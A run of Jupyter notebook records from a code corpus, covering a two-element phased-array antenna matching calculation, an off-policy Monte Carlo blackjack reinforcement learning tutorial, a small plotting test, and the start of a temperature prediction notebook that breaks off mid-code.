dtype=np.int32)])\nprint(output)\nencoded_output = []\nfor _id in output[0]:\n _id = int(_id)\n if _id == tokenizer.EOS_ID:\n break\n encoded_output.append(_id)\ndecoded_output = subtokenizer.decode(encoded_output)\nprint(decoded_output)", "[[ 6 21 450 21 450 21 450 21 450 21 450 21 450 21 450 21 450 21\n 450 21 450 21 450 21 450 21 450 2 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]\nはいはいはいはいはいはいはいはいはいはいはいはいはい\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb206c6f593eeae098073bb7de6b2b3cdd6c1256
6,596
ipynb
Jupyter Notebook
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
2
2018-12-31T15:48:55.000Z
2021-08-28T00:19:14.000Z
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
null
null
null
f2_twoelement135.ipynb
roseengineering/phasedarray_abcd
4bb94a467898bba7e5f733ebb5dbaef129301dd1
[ "MIT" ]
null
null
null
22.134228
69
0.449363
[ [ [ "# figure 2", "_____no_output_____" ], [ "import numpy as np\nfrom abcd import *", "_____no_output_____" ], [ "# 2-element array\nz11 = 36.4\nz12 = 15-15j\ni = np.matrix([1, -1j]).T\ne = np.matrix([[z11, z12], [z12, z11]]) * i\nprint('i =\\n', i)\nprint('z =\\n', e / i)", "i =\n [[ 1.+0.j]\n [-0.-1.j]]\nz =\n [[21.4-15.j]\n [51.4+15.j]]\n" ], [ "# at element\nline1 = vec(e[0], i[0])\nstatus(line1, 1)\nline2 = vec(e[1], i[1])\nstatus(line2, 2)\ntotal = power(line1) + power(line2)\nprint('feed power =', total)\nfeed_voltage = np.sqrt(total * 50)\nprint('feed voltage = %.4f' % feed_voltage)\nline1_r = feed_voltage**2 / power(line1)\nline2_r = feed_voltage**2 / power(line2)\nprint('line1 R = %.4f' % line1_r)\nprint('line2 R = %.4f' % line2_r)", "p(1) = 21.4000\nz(1) = 21.4000-15.0000j\ni(1) = 1.0000 / 0.0000\ne(1) = 26.1335 / -35.0279\n\np(2) = 51.4000\nz(2) = 51.4000+15.0000j\ni(2) = 1.0000 / -90.0000\ne(2) = 53.5440 / -73.7312\n\nfeed power = 72.8\nfeed voltage = 60.3324\nline1 R = 170.0935\nline2 R = 70.8171\n" ], [ "print('line1 Emax(rms) = %.4f' % emax(line1))\nprint('line2 Emax(rms) = %.4f' % emax(line2))", "line1 Emax(rms) = 52.6268\nline2 Emax(rms) = 58.7843\n" ], [ "# 135 degree coax line\nline1 = tline(135) * line1\nstatus(line1, 1)\nline2 = tline(135) * line2\nstatus(line2, 2)\nNone", "p(1) = 21.4000\nz(1) = 63.5785-53.9835j\ni(1) = 0.5802 / 148.5572\ne(1) = 48.3888 / 108.2231\n\np(2) = 51.4000\nz(2) = 37.4256+2.6719j\ni(2) = 1.1719 / 51.6641\ne(2) = 43.9714 / 55.7477\n\n" ], [ "# half pi\nz = impedance(line1)\nx = to_halfpi(line1_r, z)[0]\nprint(component(x, 3.8e6))\nline1 = halfpi(*x) * line1\nstatus(line1, 1)\n\nz = impedance(line2)\nx = to_halfpi(line2_r, z)[1]\nprint(component(x, 3.8e6))\nline2 = halfpi(*x) * line2\nstatus(line2, 2)\nNone", "['5.504uH', '1.479nF']\np(1) = 21.4000\nz(1) = 170.0935+0.0000j\ni(1) = 0.3547 / 96.2465\ne(1) = 60.3324 / 96.2465\n\n['558.6pF', '1.369uH']\np(2) = 51.4000\nz(2) = 70.8171+0.0000j\ni(2) = 0.8519 / 95.0313\ne(2) = 60.3324 / 95.0313\n\n" ], [ "# pi circuit\nlag = ephase(line1) - ephase(line2)\nprint('lag21 = {:.4f}'.format(lag))\nx = to_fullpi(lag, line2_r)\nprint(component(x, 3.8e6))\nline2 = fullpi(*x) * line2\nstatus(line2, \"1\")\nlag = ephase(line1) - ephase(line2)\nprint('lag21 = {:.4f}'.format(lag))", "lag21 = 1.2152\n['6.272pF', '62.9nH', '6.272pF']\np(1) = 51.4000\nz(1) = 70.8171-0.0000j\ni(1) = 0.8519 / 96.2465\ne(1) = 60.3324 / 96.2465\n\nlag21 = 0.0000\n" ], [ "print('e(1) = {}'.format(polar(line1[0])))\nprint('e(2) = {}'.format(polar(line2[0])))\nprint('Z line 1 = {:.4f}'.format(impedance(line1)))\nprint('Z line 2 = {:.4f}'.format(impedance(line2)))\nprint('in parallel z = {:.4f}'.format(impedance(line1, line2)))", "e(1) = 60.3324 / 96.2465\ne(2) = 60.3324 / 96.2465\nZ line 1 = 170.0935+0.0000j\nZ line 2 = 70.8171-0.0000j\nin parallel z = 50.0000-0.0000j\n" ], [ "# put all lines in parallel\nprint('feed power = %.4f' % total)\nprint('feed voltage = %.4f' % feed_voltage)\nline = vec(line1[0], line1[1]+line2[1])\nstatus(line, 0)\nNone", "feed power = 72.8000\nfeed voltage = 60.3324\np(0) = 72.8000\nz(0) = 50.0000-0.0000j\ni(0) = 1.2066 / 96.2465\ne(0) = 60.3324 / 96.2465\n\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb2071004dc3925bb86c89288d76e4dfeab21ff7
654,161
ipynb
Jupyter Notebook
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
_notebooks/2022-01-27-MCControl_OffPolicy_BlackJack.ipynb
LearnableLoopAI/blog2
2b606197293f5c03fd6502b00ab4b2c9d16db5f8
[ "Apache-2.0" ]
null
null
null
497.839422
241,454
0.931402
[ [ [ "# \"Monte Carlo 6: Off-Policy Control with Importance Sampling in Reinforcement Learning\"\n\n> Find the optimal policy using Weighted Importance Sampling\n- toc: true\n- branch: master\n- badges: false\n- comments: true\n- hide: false\n- search_exclude: true\n- metadata_key1: metadata_value1\n- metadata_key2: metadata_value2\n- image: images/MCControl_OffPolicy_BlackJack.png\n- categories: [Reinforcement_Learning,MC, OpenAI,Gym,]\n- show_tags: true", "_____no_output_____" ] ], [ [ "# hide\n# inspired by \n# https://github.com/dennybritz/reinforcement-learning/blob/master/MC/Off-Policy%20MC%20Control%20with%20Weighted%20Importance%20Sampling%20Solution.ipynb", "_____no_output_____" ], [ "#hide\nfrom google.colab import drive\ndrive.mount('/content/gdrive', force_remount=True)\nroot_dir = \"/content/gdrive/My Drive/\"\n# base_dir = root_dir + 'Sutton&Barto/ch05/dennybritz_reinforcement-learning_MC/'\nbase_dir = root_dir + 'Sutton&Barto/'", "Mounted at /content/gdrive\n" ], [ "# hide\n%cd \"{base_dir}\"", "/content/gdrive/My Drive/Sutton&Barto\n" ], [ "# hide\n!pwd", "/content/gdrive/My Drive/Sutton&Barto\n" ] ], [ [ "## 1. Introduction\n\nIn a *Markov Decision Process* (Figure 1) the *agent* and *environment* interacts continuously.\n\n![Figure 1 Agent/Environment interaction in a MDP](../images/mc-prediction_agent-environment_fig1.png \"Figure 1 Agent/Environment interaction in a MDP\")\n\nMore details are available in [Reinforcement Learning: An Introduction by Sutton and Barto](http://incompleteideas.net/book/RLbook2020.pdf).\n\nThe dynamics of the MDP is given by\n$$ \n\\begin{aligned}\np(s',r|s,a) &= Pr\\{ S_{t+1}=s',R_{t+1}=r | S_t=s,A_t=a \\} \\\\\n\\end{aligned}\n$$\n\nThe *policy* of an agent is a mapping from the current state of the environment to an *action* that the agent needs to take in this state. Formally, a policy is given by\n$$ \n\\begin{aligned}\n\\pi(a|s) &= Pr\\{A_t=a|S_t=s\\}\n\\end{aligned}\n$$\n\nThe discounted *return* is given by\n$$ \n\\begin{aligned}\nG_t &= R_{t+1} + \\gamma R_{t+2} + \\gamma ^2 R_{t+3} + ... + R_T \\\\\n &= \\sum_{k=0}^\\infty \\gamma ^k R_{t+1+k}\n\\end{aligned}\n$$\nwhere $\\gamma$ is the discount factor and $R$ is the *reward*.\n\nMost reinforcement learning algorithms involve the estimation of value functions - in our present case, the *state-value function*. The state-value function maps each state to a measure of \"how good it is to be in that state\" in terms of expected rewards. Formally, the state-value function, under policy $\\pi$ is given by\n$$ \n\\begin{aligned}\nv_\\pi(s) &= \\mathbb{E}_\\pi[G_t|S_t=s]\n\\end{aligned}\n$$\n\nThe Monte Carlo algorithm discussed in this post will numerically estimate $v_\\pi(s)$.", "_____no_output_____" ], [ "## 2. Environment", "_____no_output_____" ], [ "The environment is the game of *Blackjack*. The player tries to get cards whose sum is as great as possible without exceeding 21. Face cards count as 10. An ace can be taken either as a 1 or an 11. Two cards are dealth to both dealer and player. One of the dealer's cards is face up (other is face down). The player can request additional cards, one by one (called *hits*) until the player stops (called *sticks*) or goes above 21 (goes *bust* and loses). When the players sticks it becomes the dealer's turn which uses a fixed strategy: sticks when the sum is 17 or greater and hits otherwise. 
If the dealer goes bust the player wins, otherwise the winner is determined by whose sum is closer to 21.\n\nWe formulate this game as an episodic finite MDP. Each game is an episode. \n\n* States are based on the player's\n * current sum (12-21)\n * player will automatically keep on getting cards until the sum is at least 12 (this is a rule and the player does not have a choice in this matter)\n * dealer's face up card (ace-10)\n * whether player holds usable ace (True or False)\n\nThis gives a total of 200 states: $10 × 10 \\times 2 = 200$\n\n* Rewards:\n * +1 for winning\n * -1 for losing\n * 0 for drawing\n\n* Reward for stick:\n * +1 if sum > sum of dealer\n * 0 if sum = sum of dealer\n * -1 if sum < sum of dealer\n\n* Reward for hit:\n * -1 if sum > 21\n * 0 otherwise\n\nThe environment is implemented using the OpenAI Gym library.", "_____no_output_____" ], [ "## 3. Agent", "_____no_output_____" ], [ "The *agent* is the player. After observing the state of the *environment*, the agent can take one of two possible actions:\n\n* stick (0) [stop receiving cards]\n* hit (1) [have another card]\n\nThe agent's policy will be deterministic - will always stick of the sum is 20 or 21, and hit otherwise. We call this *policy1* in the code.", "_____no_output_____" ], [ "## 4. Monte Carlo Estimation of the Action-value Function, $q_\\pi(s,a)$", "_____no_output_____" ], [ "We will now proceed to estimate the action-value function for the given policy $\\pi$. We can take $\\gamma=1$ as the sum will remain finite:\n\n$$ \\large\n\\begin{aligned}\nq_\\pi(s,a) &= \\mathbb{E}_\\pi[G_t | S_t=s, A_t=a] \\\\\n &= \\mathbb{E}_\\pi[R_{t+1} + \\gamma R_{t+2} + \\gamma ^2 R_{t+3} + ... + R_T | S_t=s, A_t=a] \\\\\n &= \\mathbb{E}_\\pi[R_{t+1} + R_{t+2} + R_{t+3} + ... + R_T | S_t=s, A_t=a]\n\\end{aligned}\n$$\n\nIn numeric terms this means that, given a state and an action, we take the sum of all rewards from that state onwards (following policy $\\pi$) until the game ends, and take the average of all such sequences.\n", "_____no_output_____" ], [ "### 4.1 Off-policy Estimation via Importance Sampling", "_____no_output_____" ], [ "On-policy methods, used so far in this series, represents a compromise. They learn action values not for the optimal policy but for a near-optimal policy that can still explore. The off-policy methods, on the other hand, make use of *two* policies - one that is being optimized (called the *target* policy) and another one (the *behavior* policy) that is used for exploratory purposes. \n\nAn important concept used by off-policy methods is *importance sampling*. This is a general technique for extimating expected values under one distribution by using samples from another. This allows us to weight returns according to the relative probability of a trajectory occurring under the target and behavior policies. This relative probability is called the importance-sampling ratio\n\n$$ \\large\n\\rho_{t:T-1}=\\frac{\\prod_{k=t}^{T-1} \\pi(A_k|S_k) p(S_{k+1}|S_k,A_k)}{\\prod_{k=t}^{T-1} b(A_k|S_k) p(S_{k+1}|S_k,A_k)}=∏_{k=t}^{T-1} \\frac{\\pi(A_k|S_k)}{b(A_k|S_k)}\n$$\n\nwhere $\\pi$ is the *target* policy, and $b$ is the *behavior* policy.\n\nIn oder to estimate $q_{\\pi}(s,a)$ we need to estimate expected returns under the target policy. However, we only have access to returns due to the behavior \npolicy. 
To perform this \"off-policy\" procedure we can make use of the following:\n\n$$ \\large\n\\begin{aligned}\nq_\\pi(s,a) &= \\mathbb E_\\pi[G_t|S_t=s, A_t=a] \\\\\n &= \\mathbb E_b[\\rho_{t:T-1}G_t|S_t=s, A_t=a]\n\\end{aligned}\n$$\n\nThis allows us to simply scale or weight the returns under $b$ to yield returns under $\\pi$.\n\nIn our current *prediction* problem, both the target and behavior policies are fixed.", "_____no_output_____" ], [ "## 5. Implementation", "_____no_output_____" ], [ "Figure 2 shows the algorithm for off-policy control for the estimation of the optimal policy function:\n\n![Figure 2 MCControl, Off-Policy, for estimating the optimal policy](../images/MCControl_OffPolicy_BlackJack_Algorithm.png \"Figure 2 MCControl, Off-Policy, for estimating the optimal policy\")", "_____no_output_____" ], [ "Next, we present the code that implements the algorithm.", "_____no_output_____" ] ], [ [ "import gym\nimport matplotlib\nimport numpy as np\nimport sys\nfrom collections import defaultdict\nimport pprint as pp\nfrom matplotlib import pyplot as plt\n%matplotlib inline", "_____no_output_____" ], [ "# hide\n# from lib import plotting as myplot\n# from lib.envs.blackjack import BlackjackEnv\nfrom dennybritz_lib import plotting as myplot\nfrom dennybritz_lib.envs.blackjack import BlackjackEnv", "_____no_output_____" ], [ "# hide\n# env = gym.make('Blackjack-v0')#.has differences cp to the one used here\n#- env = gym.make('Blackjack-v1')#.does not exist", "_____no_output_____" ], [ "env = BlackjackEnv()", "_____no_output_____" ] ], [ [ "### 5.1 Policy\n\nThe following function captures the target policy used:", "_____no_output_____" ] ], [ [ "def create_random_policy(n_A):\n A = np.ones(n_A, dtype=float)/n_A\n def policy_function(observation):\n return A\n return policy_function #vector of action probabilities", "_____no_output_____" ], [ "# hide\n# def create_greedy_policy(Q):\n# def policy_function(state):\n# A = np.zeros_like(Q[state], dtype=float)\n# best_action = np.argmax(Q[state])\n# A[best_action] = 1.0\n# return A\n# return policy_function", "_____no_output_____" ], [ "# hide\n# def create_policy():\n# policy = defaultdict(int)\n# for sum in [12, 13, 14, 15, 16, 17, 18, 19, 20, 21]:\n# for showing in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:\n# for usable in [False, True]:\n# policy[(sum, showing, usable)] = np.random.choice([0, 1]) #random\n# # policy[(sum, showing, usable)] = 0 #all zeros\n# return policy", "_____no_output_____" ], [ "def create_policy():\n policy = defaultdict(int)\n return policy", "_____no_output_____" ] ], [ [ "### 5.2 Generate episodes\n\nThe following function sets the environment to a random initial state. It then enters a loop where each iteration applies the policy to the environment's state to obtain the next action to be taken by the agent. That action is then applied to the environment to get the next state, and so on until the episode ends.", "_____no_output_____" ] ], [ [ "def generate_episode(env, policy):\n episode = []\n state = env.reset() #to a random state\n while True:\n probs = policy(state)\n action = np.random.choice(np.arange(len(probs)), p=probs)\n next_state, reward, done, _ = env.step(action) # St+1, Rt+1 OR s',r\n episode.append((state, action, reward)) # St, At, Rt+1 OR s,a,r\n if done:\n break\n state = next_state\n return episode", "_____no_output_____" ] ], [ [ "### 5.3 Main loop\n\nThe following function implements the main loop of the algorithm. It iterates for ``n_episodes``. 
It also takes a list of ``monitored_state_actions`` for which it will record the evolution of action values. This is handy for showing how action values converge during the process.", "_____no_output_____" ] ], [ [ "def mc_control(env, n_episodes, discount_factor=1.0, monitored_state_actions=None, diag=False):\n #/// G_sum = defaultdict(float)\n #/// G_count = defaultdict(float)\n Q = defaultdict(lambda: np.zeros(env.action_space.n))\n C = defaultdict(lambda: np.zeros(env.action_space.n))\n pi = create_policy()\n monitored_state_action_values = defaultdict(list)\n for i in range(1, n_episodes + 1):\n if i%1000 == 0: print(\"\\rEpisode {}/{}\".format(i, n_episodes), end=\"\"); sys.stdout.flush()\n b = create_random_policy(env.action_space.n)\n episode = generate_episode(env, b); print(f'\\nepisode {i}: {episode}') if diag else None\n G = 0.0\n W = 1.0\n for t in range(len(episode))[::-1]:\n St, At, Rtp1 = episode[t]\n print(f\"---t={t} St, At, Rt+1: {St, At, Rtp1}\") if diag else None\n G = discount_factor*G + Rtp1; print(f\"G: {G}\") if diag else None\n C[St][At] += W; print(f\"C[St][At]: {C[St][At]}\") if diag else None #Weighted Importance Sampling (WIS) denominator\n Q[St][At] += (W/C[St][At])*(G - Q[St][At]); print(f\"Q[St][At]: {Q[St][At]}\") if diag else None\n pi[St] = np.argmax(Q[St]) #greedify pi, max_a Q[state][0], Q[state][1]\n if At != np.argmax(pi[St]):\n break\n W = W*1.0/b(St)[At]; print(f\"W: {W}, b(St)[At]: {b(St)[At]}\") if diag else None\n if monitored_state_actions:\n for msa in monitored_state_actions: \n s = msa[0]; a = msa[1] \n # print(\"\\rQ[{}]: {}\".format(msa, Q[s][a]), end=\"\"); sys.stdout.flush()\n monitored_state_action_values[msa].append(Q[s][a])\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None\n #/// pp.pprint(f'G_sum: {G_sum}') if diag else None\n #/// pp.pprint(f'G_count: {G_count}') if diag else None\n print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None\n print('\\nmonitored_state_action_values:', monitored_state_action_values) if diag else None\n return Q,pi,monitored_state_action_values ", "_____no_output_____" ] ], [ [ "### 5.4 Monitored state-actions\n\nLet's pick a number of state-actions to monitor. 
Each tuple captures the player's sum, the dealer's showing card, and whether the player has a usable ace, as well as the action taken in the state:", "_____no_output_____" ] ], [ [ "monitored_state_actions=[((21, 7, False), 0), ((20, 7, True), 0), ((12, 7, False), 1), ((17, 7, True), 0)]", "_____no_output_____" ], [ "Q,pi,monitored_state_action_values = mc_control(\n env, \n n_episodes=10, \n monitored_state_actions=monitored_state_actions,\n diag=True)", "\nepisode 1: [((15, 3, False), 1, 0), ((19, 3, False), 1, -1)]\n---t=1 St, At, Rt+1: ((19, 3, False), 1, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\n\nepisode 2: [((18, 1, False), 0, -1)]\n---t=0 St, At, Rt+1: ((18, 1, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 3: [((20, 10, False), 0, 1)]\n---t=0 St, At, Rt+1: ((20, 10, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 4: [((20, 6, False), 0, 1)]\n---t=0 St, At, Rt+1: ((20, 6, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 5: [((15, 3, True), 1, 0), ((15, 3, False), 0, -1)]\n---t=1 St, At, Rt+1: ((15, 3, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n---t=0 St, At, Rt+1: ((15, 3, True), 1, 0)\nG: -1.0\nC[St][At]: 2.0\nQ[St][At]: -1.0\n\nepisode 6: [((13, 4, False), 0, 1)]\n---t=0 St, At, Rt+1: ((13, 4, False), 0, 1)\nG: 1.0\nC[St][At]: 1.0\nQ[St][At]: 1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 7: [((14, 9, False), 0, -1)]\n---t=0 St, At, Rt+1: ((14, 9, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 8: [((17, 10, False), 1, -1)]\n---t=0 St, At, Rt+1: ((17, 10, False), 1, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\n\nepisode 9: [((16, 7, False), 0, -1)]\n---t=0 St, At, Rt+1: ((16, 7, False), 0, -1)\nG: -1.0\nC[St][At]: 1.0\nQ[St][At]: -1.0\nW: 2.0, b(St)[At]: 0.5\n\nepisode 10: [((20, 6, False), 1, 0), ((21, 6, False), 0, 0)]\n---t=1 St, At, Rt+1: ((21, 6, False), 0, 0)\nG: 0.0\nC[St][At]: 1.0\nQ[St][At]: 0.0\nW: 2.0, b(St)[At]: 0.5\n---t=0 St, At, Rt+1: ((20, 6, False), 1, 0)\nG: 0.0\nC[St][At]: 2.0\nQ[St][At]: 0.0\n\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\"G_sum: defaultdict(<class 'float'>, {})\"\n\"G_count: defaultdict(<class 'float'>, {})\"\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nmonitored_state_action_values: defaultdict(<class 'list'>, {((21, 7, False), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((20, 7, True), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((12, 7, False), 1): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], ((17, 7, True), 0): [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]})\n" ], [ "Q", "_____no_output_____" ], [ "Q[(13, 5, False)]", "_____no_output_____" ], [ "pi", "_____no_output_____" ], [ "pi[(18, 4, False)]", "_____no_output_____" ], [ "V = defaultdict(float)\nfor state, actions in Q.items():\n action_value = np.max(actions)\n V[state] = action_value", "_____no_output_____" ], [ "V", "_____no_output_____" ], [ "print(monitored_state_actions[0])\nprint(monitored_state_action_values[monitored_state_actions[0]])", "((21, 7, False), 0)\n[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values[msa][-1], Q[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: 
((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ] ], [ [ "### 5.5 Run 1\n\nFirst, we will run the algorithm for 10,000 episodes, using policy1:", "_____no_output_____" ] ], [ [ "Q1,pi1,monitored_state_action_values1 = mc_control(\n env, \n n_episodes=10_000, \n monitored_state_actions=monitored_state_actions,\n diag=False)", "Episode 10000/10000" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values1[msa][-1], Q1[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: ((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ] ], [ [ "The following chart shows how the values of the 4 monitored state-actions converge to their values:", "_____no_output_____" ] ], [ [ "plt.rcParams[\"figure.figsize\"] = (18,10)\nfor msa in monitored_state_actions:\n plt.plot(monitored_state_action_values1[msa])\nplt.title('Estimated $q_\\pi(s,a)$ for some state-actions', fontsize=18)\nplt.xlabel('Episodes', fontsize=16)\nplt.ylabel('Estimated $q_\\pi(s,a)$', fontsize=16)\nplt.legend(monitored_state_actions, fontsize=16)\nplt.show()", "_____no_output_____" ] ], [ [ "The following charts shows the estimate of the associated estimated optimal state-value function, $v_*(s)$, for the cases of a usable ace as well as not a usable ace. First, we compute ```V1``` which is the estimate for $v_*(s)$:", "_____no_output_____" ] ], [ [ "V1 = defaultdict(float)\nfor state, actions in Q1.items():\n action_value = np.max(actions)\n V1[state] = action_value", "_____no_output_____" ], [ "AZIM = -110\nELEV = 20", "_____no_output_____" ], [ "myplot.plot_pi_star_and_v_star(pi1, V1, title=\"$\\pi_* and v_*$\", wireframe=False, azim=AZIM-40, elev=ELEV);", "_____no_output_____" ] ], [ [ "### 5.6 Run 2\n\nOur final run uses 500,000 episodes and the accuracy of the action-value function is higher.", "_____no_output_____" ] ], [ [ "Q2,pi2,monitored_state_action_values2 = mc_control(\n env, \n n_episodes=500_000, \n monitored_state_actions=monitored_state_actions,\n diag=False)", "Episode 500000/500000" ], [ "# \n# last value in monitored_state_actions should be value in Q\nmsa = monitored_state_actions[0]; print('msa:', msa)\ns = msa[0]; print('s:', s)\na = msa[1]; print('a:', a)\nmonitored_state_action_values2[msa][-1], Q2[s][a] #monitored_stuff[msa] BUT Q[s][a]", "msa: ((21, 7, False), 0)\ns: (21, 7, False)\na: 0\n" ], [ "plt.rcParams[\"figure.figsize\"] = (18,12)\nfor msa in monitored_state_actions:\n plt.plot(monitored_state_action_values2[msa])\nplt.title('Estimated $q_\\pi(s,a)$ for some state-actions', fontsize=18)\nplt.xlabel('Episodes', fontsize=16)\nplt.ylabel('Estimated $q_\\pi(s,a)$', fontsize=16)\nplt.legend(monitored_state_actions, fontsize=16)\nplt.show()", "_____no_output_____" ], [ "V2 = defaultdict(float)\nfor state, actions in Q2.items():\n action_value = np.max(actions)\n V2[state] = action_value", "_____no_output_____" ], [ "# myplot.plot_action_value_function(Q2, title=\"500,000 Steps\", wireframe=True, azim=AZIM, elev=ELEV)\nmyplot.plot_pi_star_and_v_star(pi2, V2, title=\"$\\pi_* and v_*$\", wireframe=False, azim=AZIM-40, elev=ELEV);", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb2079138b6972e127c3b43fed16b878f1fe4acb
95,700
ipynb
Jupyter Notebook
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
notebooks/test.ipynb
jakoch/jupyter-devbox
d97cc1c874531f462e0c950ebd72d200996ecc77
[ "MIT" ]
null
null
null
765.6
42,533
0.73279
[ [ [ "### Welcome\n\nThis cell contains text. You can also apply **Markdown** formatting to it. \n\nThe next cells contain Python code, which runs interactively. \n\nEnjoy!", "_____no_output_____" ] ], [ [ "mylist = list(range(10))\nassert len(mylist) == 10\nprint(mylist)\n", "[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n" ], [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport random\nplt.plot(range(random.randint(5,20)))\nplt.ylabel('some numbers on the y-axis')\nplt.xlabel('some numbers on the x-axis')\nprint(\"Let's plot\")", "Let's plot\n" ], [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nx, y = np.mgrid[-2:2:500j, -2:2:500j]\nz = (x**2 + y**2 - 1)**3 - x**2 * y**3\nplt.contourf(x, y, z, levels=[-1, 0], colors=[\"red\"])\nplt.gca().set_aspect(\"equal\");", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code" ] ]
cb207ce028e0c1748f687b6e00ffe7a36f75fc78
1,033,273
ipynb
Jupyter Notebook
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
WeatherPrediction/WeatherPrediction.ipynb
SChoiGitHub/Machine-Learning-Experiments
684edf4ba39dddf0a7491128ee50cd7064788a9b
[ "CC-BY-4.0" ]
null
null
null
981.265907
430,474
0.936928
[ [ [ "import pandas as pd\nfrom sklearn.model_selection import train_test_split\n'''\nNOTE: This was done in Google Colab\n\nThe data (Minimum Daily Temperatures Dataset) is from \nJason Brownlee's \"7 Time Series Datasets for Machine Learning\" article:\nhttps://machinelearningmastery.com/time-series-datasets-for-machine-learning/\n\nHis datasets are found at:\nhttps://github.com/jbrownlee/Datasets\n\nThis specific data is found at:\nhttps://github.com/jbrownlee/Datasets/blob/master/daily-min-temperatures.csv\n\nIt is also found at:\nhttps://www.kaggle.com/paulbrabban/daily-minimum-temperatures-in-melbourne/\n'''\n#Obtain Data:\ndf = pd.read_csv('/content/daily-min-temperatures.csv')\ntrain, test = train_test_split(df,test_size=0.25)\ntrain_x, train_y = train[['Date']], train[['Temp']]\ntest_x,train_y = test[['Date']], test[['Temp']]\n", "_____no_output_____" ], [ "'''\nNaive approach\n-Convert Date into Year,Month,Days. These should become one-hot variables.\n-Suppose the idea of years is not in this model.\n-The idea is that the model notices that winter months should be colder than summer months.\n'''\nimport tensorflow as tf\nimport tensorflow.keras\nfrom datetime import datetime\nfrom tensorflow.keras import layers, Sequential\nfrom sklearn.preprocessing import MinMaxScaler \n\n\n\n\ndef build_model():\n model = Sequential([\n layers.Flatten(input_shape=(43,)),\n layers.Dropout(0.5),\n layers.Dense(43,activation='relu'),\n layers.Dropout(0.5),\n layers.Dense(1),\n ])\n \n model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])\n\n return model\n\ndef convertDates(df):\n dateConverted = 